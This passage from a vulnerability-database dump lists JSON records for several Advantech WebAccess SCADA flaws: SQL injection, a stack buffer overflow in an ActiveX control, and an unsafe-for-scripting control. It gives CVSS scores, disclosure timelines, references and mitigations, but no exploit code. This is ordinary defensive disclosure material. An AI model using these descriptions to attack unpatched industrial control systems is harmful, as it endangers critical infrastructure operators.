Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). SQL injection vulnerabilities exist in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. An information-disclosure vulnerability\n3. A file-upload vulnerability\n4. Multiple directory-traversal vulnerabilities\n5. Multiple stack-based buffer-overflow vulnerabilities\n6. A heap-based buffer-overflow vulnerability\n7. Multiple arbitrary code-execution vulnerabilities\n8. A denial-of-service vulnerability\n9. A security-bypass vulnerability\n10. A privilege-escalation vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions", "sources": [ { "db": "NVD", "id": "CVE-2018-7501" }, { "db": "ZDI", "id": "ZDI-18-478" }, { "db": "ZDI", "id": "ZDI-18-477" }, { "db": "ZDI", "id": "ZDI-18-475" }, { "db": "ZDI", "id": "ZDI-18-487" }, { "db": "ZDI", "id": "ZDI-18-480" }, { "db": "ZDI", "id": "ZDI-18-476" }, { "db": "ZDI", "id": "ZDI-18-481" }, { "db": "ZDI", "id": "ZDI-18-553" }, { "db": "ZDI", "id": "ZDI-18-474" }, { "db": "ZDI", "id": "ZDI-18-479" }, { "db": "ZDI", "id": "ZDI-18-486" }, { "db": "ZDI", "id": "ZDI-18-488" }, { "db": "ZDI", "id": "ZDI-18-485" }, { "db": "ZDI", "id": "ZDI-18-489" }, { "db": "CNVD", "id": "CNVD-2018-10317" }, { "db": "BID", "id": "104190" }, { "db": "IVD", "id": "e2f022cf-39ab-11e9-a809-000c29342cb1" } ], "trust": 10.71 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2018-7501", "trust": 12.5 }, { "db": "ICS CERT", "id": "ICSA-18-135-01", "trust": 2.5 }, { "db": "BID", "id": "104190", "trust": 2.5 }, { "db": "CNVD", "id": "CNVD-2018-10317", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201805-445", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5611", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-481", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5653", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-489", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5649", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-485", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5652", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-488", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5650", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-486", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5609", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-479", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5597", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-474", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5608", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-478", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5590", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-553", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5606", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-476", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5610", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-480", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5651", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-487", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5595", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-475", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5607", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-477", "trust": 0.7 }, { "db": "IVD", "id": "E2F022CF-39AB-11E9-A809-000C29342CB1", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "e2f022cf-39ab-11e9-a809-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-481" }, { "db": "ZDI", "id": "ZDI-18-489" }, { "db": "ZDI", "id": "ZDI-18-485" }, { "db": "ZDI", "id": "ZDI-18-488" }, { "db": "ZDI", "id": "ZDI-18-486" }, { "db": "ZDI", "id": "ZDI-18-479" }, { "db": "ZDI", "id": "ZDI-18-474" }, { "db": "ZDI", "id": "ZDI-18-478" }, { "db": "ZDI", "id": "ZDI-18-553" }, { "db": "ZDI", "id": "ZDI-18-476" }, { "db": "ZDI", "id": "ZDI-18-480" }, { "db": "ZDI", "id": "ZDI-18-487" }, { "db": "ZDI", "id": "ZDI-18-475" }, { "db": "ZDI", "id": "ZDI-18-477" }, { "db": "CNVD", "id": "CNVD-2018-10317" }, { "db": "BID", "id": "104190" }, { "db": "CNNVD", "id": "CNNVD-201805-445" }, { "db": "NVD", "id": "CVE-2018-7501" } ] }, "id": "VAR-201805-1144", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2f022cf-39ab-11e9-a809-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10317" } ], "trust": 1.4434040525 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f022cf-39ab-11e9-a809-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10317" } ] }, "last_update_date": "2024-11-29T22:46:30.043000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 9.8, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" }, { "title": "Patch for Advantech WebAccess SQL Injection Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/130233" }, { "title": "Multiple Advantech product SQL Repair measures for injecting vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=80055" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-481" }, { "db": "ZDI", "id": "ZDI-18-489" }, { "db": "ZDI", "id": "ZDI-18-485" }, { "db": "ZDI", "id": "ZDI-18-488" }, { "db": "ZDI", "id": "ZDI-18-486" }, { "db": "ZDI", "id": "ZDI-18-479" }, { "db": "ZDI", "id": "ZDI-18-474" }, { "db": "ZDI", "id": "ZDI-18-478" }, { "db": "ZDI", "id": "ZDI-18-553" }, { "db": "ZDI", "id": "ZDI-18-476" }, { "db": "ZDI", "id": "ZDI-18-480" }, { "db": "ZDI", "id": "ZDI-18-487" }, { "db": "ZDI", "id": "ZDI-18-475" }, { "db": "ZDI", "id": "ZDI-18-477" }, { "db": "CNVD", "id": "CNVD-2018-10317" }, { "db": "CNNVD", "id": "CNNVD-201805-445" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-89", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2018-7501" } ] }, "references": { "_id": null, "data": [ { "trust": 12.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-135-01" }, { "trust": 1.6, "url": "http://www.securityfocus.com/bid/104190" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-481" }, { "db": "ZDI", "id": "ZDI-18-489" }, { "db": "ZDI", "id": "ZDI-18-485" }, { "db": "ZDI", "id": "ZDI-18-488" }, { "db": "ZDI", "id": "ZDI-18-486" }, { "db": "ZDI", "id": "ZDI-18-479" }, { "db": "ZDI", "id": "ZDI-18-474" }, { "db": "ZDI", "id": "ZDI-18-478" }, { "db": "ZDI", "id": "ZDI-18-553" }, { "db": "ZDI", "id": "ZDI-18-476" }, { "db": "ZDI", "id": "ZDI-18-480" }, { "db": "ZDI", "id": "ZDI-18-487" }, { "db": "ZDI", "id": "ZDI-18-475" }, { "db": "ZDI", "id": "ZDI-18-477" }, { "db": "CNVD", "id": "CNVD-2018-10317" }, { "db": "BID", "id": "104190" }, { "db": "CNNVD", "id": "CNNVD-201805-445" }, { "db": "NVD", "id": "CVE-2018-7501" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2f022cf-39ab-11e9-a809-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-481", "ident": null }, { "db": "ZDI", "id": "ZDI-18-489", "ident": null }, { "db": "ZDI", "id": "ZDI-18-485", "ident": null }, { "db": "ZDI", "id": "ZDI-18-488", "ident": null }, { "db": "ZDI", "id": "ZDI-18-486", "ident": null }, { "db": "ZDI", "id": "ZDI-18-479", "ident": null }, { "db": "ZDI", "id": "ZDI-18-474", "ident": null }, { "db": "ZDI", "id": "ZDI-18-478", "ident": null }, { "db": "ZDI", "id": "ZDI-18-553", "ident": null }, { "db": "ZDI", "id": "ZDI-18-476", "ident": null }, { "db": "ZDI", "id": "ZDI-18-480", "ident": null }, { "db": "ZDI", "id": "ZDI-18-487", "ident": null }, { "db": "ZDI", "id": "ZDI-18-475", "ident": null }, { "db": "ZDI", "id": "ZDI-18-477", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-10317", "ident": null }, { "db": "BID", "id": "104190", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201805-445", "ident": null }, { "db": "NVD", "id": "CVE-2018-7501", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-05-25T00:00:00", "db": "IVD", "id": "e2f022cf-39ab-11e9-a809-000c29342cb1", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-481", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-489", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-485", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-488", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-486", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-479", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-474", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-478", "ident": null }, { "date": "2018-06-08T00:00:00", "db": "ZDI", "id": "ZDI-18-553", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-476", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-480", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-487", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-475", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-477", "ident": null }, { "date": "2018-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2018-10317", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190", "ident": null }, { "date": "2018-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-445", "ident": null }, { "date": "2018-05-15T22:29:00.567000", "db": "NVD", "id": "CVE-2018-7501", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-481", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-489", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-485", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-488", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-486", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-479", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-474", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-478", "ident": null }, { "date": "2018-06-08T00:00:00", "db": "ZDI", "id": "ZDI-18-553", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-476", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-480", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-487", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-475", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-477", "ident": null }, { "date": "2018-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2018-10317", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190", "ident": null }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-445", "ident": null }, { "date": "2024-11-21T04:12:15.263000", "db": "NVD", "id": "CVE-2018-7501", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-445" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Node BWSCADASoap GetAlarms SQL Injection Information Disclosure Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-18-481" } ], "trust": 0.7 }, "type": { "_id": null, "data": "SQL injection", "sources": [ { "db": "IVD", "id": "e2f022cf-39ab-11e9-a809-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201805-445" } ], "trust": 0.8 } }
var-201708-1693
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-547" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-547" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-547", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-547", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-547" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-547" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4069", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-547", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-547" } ] }, "id": "VAR-201708-1693", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:05:50.399000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-547" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-547" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-547", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-547", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-547", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Brightness Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-547" } ], "trust": 0.7 } }
var-201606-0256
Vulnerability from variot
Unspecified ActiveX controls in Advantech WebAccess before 8.1_20160519 allow remote authenticated users to obtain sensitive information or modify data via unknown vectors, related to the INTERFACESAFE_FOR_UNTRUSTED_CALLER (aka safe for scripting) flag. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. An arbitrary code execution vulnerability exists in Advantech WebAccess prior to 8.1_20160519, which was caused by a program that marked an unsafe ActiveX control as safe-for-scripting. An attacker could exploit this vulnerability to insert and execute arbitrary code. Advantech WebAccess is prone to the following security vulnerabilities: 1. A local buffer-overflow vulnerability Local attackers can exploit these issues to perform unauthorized actions and crash the affected application; denying service to legitimate users. Due to the nature of these issues, code-execution may be possible but this has not been confirmed. Versions prior to Advantech WebAccess 8.1_20160519 are vulnerable
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201606-0256", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.1_20160519" }, { "model": "webaccess \u003c8.1 20160519", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "d1bda473-0057-42ed-8e3b-7d90bc3a661a" }, { "db": "CNVD", "id": "CNVD-2016-04291" }, { "db": "JVNDB", "id": "JVNDB-2016-003355" }, { "db": "CNNVD", "id": "CNNVD-201606-505" }, { "db": "NVD", "id": "CVE-2016-4525" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-003355" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Zhou Yu of Acorn Network Security.", "sources": [ { "db": "BID", "id": "91346" } ], "trust": 0.3 }, "cve": "CVE-2016-4525", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 3.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.4, "id": "CVE-2016-4525", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 1.8, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CNVD-2016-04291", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "d1bda473-0057-42ed-8e3b-7d90bc3a661a", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 3.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.4, "id": "VHN-93344", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.1, "vectorString": "AV:L/AC:M/AU:N/C:P/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 6.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.3, "id": "CVE-2016-4525", "impactScore": 5.2, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2016-4525", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2016-4525", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2016-04291", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201606-505", "trust": 0.6, "value": "LOW" }, { "author": "IVD", "id": "d1bda473-0057-42ed-8e3b-7d90bc3a661a", "trust": 0.2, "value": "LOW" }, { "author": "VULHUB", "id": "VHN-93344", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "IVD", "id": "d1bda473-0057-42ed-8e3b-7d90bc3a661a" }, { "db": "CNVD", "id": "CNVD-2016-04291" }, { "db": "VULHUB", "id": "VHN-93344" }, { "db": "JVNDB", "id": "JVNDB-2016-003355" }, { "db": "CNNVD", "id": "CNNVD-201606-505" }, { "db": "NVD", "id": "CVE-2016-4525" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified ActiveX controls in Advantech WebAccess before 8.1_20160519 allow remote authenticated users to obtain sensitive information or modify data via unknown vectors, related to the INTERFACESAFE_FOR_UNTRUSTED_CALLER (aka safe for scripting) flag. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. An arbitrary code execution vulnerability exists in Advantech WebAccess prior to 8.1_20160519, which was caused by a program that marked an unsafe ActiveX control as safe-for-scripting. An attacker could exploit this vulnerability to insert and execute arbitrary code. Advantech WebAccess is prone to the following security vulnerabilities:\n1. A local buffer-overflow vulnerability\nLocal attackers can exploit these issues to perform unauthorized actions and crash the affected application; denying service to legitimate users. Due to the nature of these issues, code-execution may be possible but this has not been confirmed. \nVersions prior to Advantech WebAccess 8.1_20160519 are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2016-4525" }, { "db": "JVNDB", "id": "JVNDB-2016-003355" }, { "db": "CNVD", "id": "CNVD-2016-04291" }, { "db": "BID", "id": "91346" }, { "db": "IVD", "id": "d1bda473-0057-42ed-8e3b-7d90bc3a661a" }, { "db": "VULHUB", "id": "VHN-93344" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-4525", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-16-173-01", "trust": 3.1 }, { "db": "AUSCERT", "id": "ESB-2016.1575", "trust": 1.2 }, { "db": "CNNVD", "id": "CNNVD-201606-505", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-04291", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-003355", "trust": 0.8 }, { "db": "BID", "id": "91346", "trust": 0.3 }, { "db": "IVD", "id": "D1BDA473-0057-42ED-8E3B-7D90BC3A661A", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-93344", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "d1bda473-0057-42ed-8e3b-7d90bc3a661a" }, { "db": "CNVD", "id": "CNVD-2016-04291" }, { "db": "VULHUB", "id": "VHN-93344" }, { "db": "BID", "id": "91346" }, { "db": "JVNDB", "id": "JVNDB-2016-003355" }, { "db": "CNNVD", "id": "CNNVD-201606-505" }, { "db": "NVD", "id": "CVE-2016-4525" } ] }, "id": "VAR-201606-0256", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "d1bda473-0057-42ed-8e3b-7d90bc3a661a" }, { "db": "CNVD", "id": "CNVD-2016-04291" }, { "db": "VULHUB", "id": "VHN-93344" } ], "trust": 1.474496345 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "d1bda473-0057-42ed-8e3b-7d90bc3a661a" }, { "db": "CNVD", 